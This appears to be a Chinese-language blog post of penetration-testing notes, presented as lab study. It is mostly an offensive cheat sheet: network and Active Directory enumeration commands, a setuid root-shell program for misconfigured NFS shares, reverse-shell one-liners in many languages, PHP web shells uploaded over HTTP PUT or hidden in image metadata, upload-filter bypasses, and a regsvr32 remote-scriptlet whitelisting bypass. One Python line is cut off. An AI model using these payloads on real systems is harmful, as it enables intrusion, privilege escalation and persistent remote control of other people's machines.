https://www.bilibili.com/video/BV1Nz4y1e7F4/?spm_id_from=333.1007.tianma.1-4-4.click&vd_source=f876921555c8be858dfa9796837ecb79
简介 探讨了一些常见的攻击性安全技术,包括获取代码执行、代码注入、防御规避、横向移动、持久性等等
我们的目标
这个项目的目标很简单——阅读其他研究人员的工作,在实验室环境中执行一些常见/不常见的攻击技术,做我自己的研究和:
了解各种网络攻击和技术是如何执行的,以及它们是如何工作的
了解如何编写恶意软件
编写代码以进一步了解攻击者和恶意软件作者使用的工具和技术
了解更多有关c++、Windows内部和Windows api的信息
查看技术和工具在端点上留下了哪些工件
尝试各种行业工具进行渗透测试、编码、调试、逆向工程、恶意软件分析,并更加熟练地使用它们
做笔记以备将来参考
侦察/枚举 从Nmap扫描中提取活ip 1 nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips
简单端口Knocking 1 for x in 7000 8000 9000; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x 1.1.1.1; done
DNS查找,区域传输和暴力破解 1 2 3 4 5 6 7 8 9 10 whois domain.com dig {a|txt|ns|mx} domain.com dig {a|txt|ns|mx} domain.com @ns1.domain.com host -t {a|txt|ns|mx} megacorpone.com host -a megacorpone.com host -l megacorpone.com ns1.megacorpone.com dnsrecon -d megacorpone.com -t axfr @ns2.megacorpone.com dnsenum domain.com nslookup -> set type=any -> ls -d domain.com for sub in $(cat subdomains.txt);do host $sub.domain.com|grep "has.address";done
Banner Grabbing 1 2 3 nc -v $TARGET 80 telnet $TARGET 80 curl -vX $TARGET
NFS导出共享 1 2 3 4 5 6 7 8 9 10 11 12 List NFS exported shares: showmount -e 192.168.110.102 ...and check if 'rw,no_root_squash' is present. If it is present, compile the below sid-shell.c: #include <unistd.h> main( int argc, char ** argv, char ** envp ) { setgid(0); setuid(0); system("/bin/bash", argv, envp); return 0; } ...upload it to the share and execute the below to launch sid-shell to spawn a root shell: chown root:root sid-shell; chmod +s sid-shell; ./sid-shell
Kerberos 枚举 1 2 3 #users nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'
HTTP暴力破解和漏洞扫描 1 2 3 target=10.0.0.1; gobuster -u http://$target -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 150 -l | tee $target-gobuster target=10.0.0.1; nikto -h http://$target:80 | tee $target-nikto target=10.0.0.1; wpscan --url http://$target:80 --enumerate u,t,p | tee $target-wpscan-enum
RPC / NetBios / SMB 1 2 3 4 5 6 7 8 9 10 rpcinfo -p $TARGET nbtscan $TARGET #list shares smbclient -L //$TARGET -U "" # null session rpcclient -U "" $TARGET smbclient -L //$TARGET enum4linux $TARGET
SNMP 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 # Windows User Accounts snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.25 # Windows Running Programs snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.4.2.1.2 # Windows Hostname snmpwalk -c public -v1 $TARGET .1.3.6.1.2.1.1.5 # Windows Share Information snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.3.1.1 # Windows Share Information snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.27 # Windows TCP Ports snmpwalk -c public -v1 $TARGET4 1.3.6.1.2.1.6.13.1.3 # Software Name snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.6.3.1.2 # brute-force community strings onesixtyone -i snmp-ips.txt -c community.txt snmp-check $TARGET
SMTP 1 smtp-user-enum -U /usr/share/wordlists/names.txt -t $TARGET -m 150
Active Directory 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 # current domain info [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() # domain trusts ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() # current forest info [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() # get forest trust relationships ([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships() # get DCs of a domain nltest /dclist:offense.local net group "domain controllers" /domain # get DC for currently authenticated session nltest /dsgetdc:offense.local # get domain trusts from cmd shell nltest /domain_trusts # get user info nltest /user:"spotless" # get DC for currently authenticated session set l # get domain name and DC the user authenticated to klist # get all logon sessions. Includes NTLM authenticated sessions klist sessions # kerberos tickets for the session klist # cached krbtgt klist tgt # whoami on older Windows systems set u # find DFS shares with ADModule Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=offense,DC=local" | select name # find DFS shares with ADSI $s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,DC=offense,DC=local"; $s.FindAll() | % {$_.properties.name} # check if spooler service is running on a host powershell ls "\\dc01\pipe\spoolss"
监听端口(Powershell) 1 2 3 4 5 6 7 8 9 10 # Start listener on port 443 $listener = [System.Net.Sockets.TcpListener]443; $listener.Start(); while($true) { $client = $listener.AcceptTcpClient(); Write-Host $client.client.RemoteEndPoint "connected!"; $client.Close(); start-sleep -seconds 1; }
获得访问权限 Reverse Shell One-Liners Bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl perl -e ‘use Socket;$i=”10.0.0.1”;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
URL-Encoded Perl: Linux echo%20%27use%20Socket%3B%24i%3D%2210.11.0.245%22%3B%24p%3D443%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%27%20%3E%20%2ftmp%2fpew%20%26%26%20%2fusr%2fbin%2fperl%20%2ftmp%2fpew
Python python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
PHP php -r ‘$sock=fsockopen(“10.0.0.1”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’
Ruby ruby -rsocket -e’f=TCPSocket.open(“10.0.0.1”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
Netcat without -e #1 rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f
Netcat without -e #2 nc localhost 443 | /bin/sh | nc localhost 444
telnet localhost 443 | /bin/sh | telnet localhost 444
Java r = Runtime.getRuntime(); p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done”] as String[]); p.waitFor();
XTerm xterm -display 10.0.0.1:1
JDWP RCE print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec(“whoami”).getInputStream())).readLine())
Working with Restricted Shells # rare cases
ssh bill@localhost ls -l /tmp
nice /bin/bash
Interactive TTY Shells /usr/bin/expect sh
python -c ‘import pty; pty.spawn(“/bin/sh”)’
# execute one command with su as another user if you do not have access to the shell. Credit to g0blin.co.uk
python -c ‘import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen([“/bin/su”,”
通过WWW上传表格上传/张贴文件 1 2 3 4 5 # POST file curl -X POST -F "file=@/file/location/shell.php" http://$TARGET/upload.php --cookie "cookie" # POST binary data to web form curl -F "field=<shell.zip" http://$TARGET/upld.php -F 'k=v' --cookie "k=v;" -F "submit=true" -L -v
通过PUT谓词将文件放到web主机上 1 curl -X PUT -d '<?php system($_GET["c"]);?>' http://192.168.2.99/shell.php
生成有效载荷模式和计算偏移量 1 2 /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000 /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q $EIP_VALUE
绕过文件上传限制 file.php -> file.jpg
file.php -> file.php.jpg
file.asp -> file.asp;.jpg
file.gif (contains php code, but starts with string GIF/GIF98)
00%
file.jpg with php backdoor in exif (see below)
.jpg -> proxy intercept -> rename to .php
在JPEG中注入PHP 1 2 exiv2 -c'A "<?php system($_REQUEST['cmd']);?>"!' backdoor.jpeg exiftool “-comment<=back.php” back.png
Uploading .htaccess to interpret .blah as .php 1 AddType application/x-httpd-php .blah
破解密码 代码执行 Regsvr32 代码执行-绕过应用程序白名单
Execution 1 2 3 4 5 6 7 8 9 10 11 12 <?XML version="1.0"?> <scriptlet> <registration progid="TESTING" classid="{A1112221-0000-0000-3000-000DA00DABFC}" > <script language="JScript"> <![CDATA[ var foo = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet>
我们需要托管后台。SCT在web服务器上,所以我们可以像这样调用它:
1 regsvr32.exe /s /i:http://10.0.0.5/back.sct scrobj.dll
观察 注意,regsvr32进程几乎立即退出。这意味着仅仅通过观察受害者机器上的过程列表,邪恶的过程可能不会立即出现……直到你意识到它是如何被调用的。Sysmon commandline日志记录可以帮助您检测这个活动:
此外,sysmon将显示regsvr32建立一个网络连接:
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 jaytp@qq.com
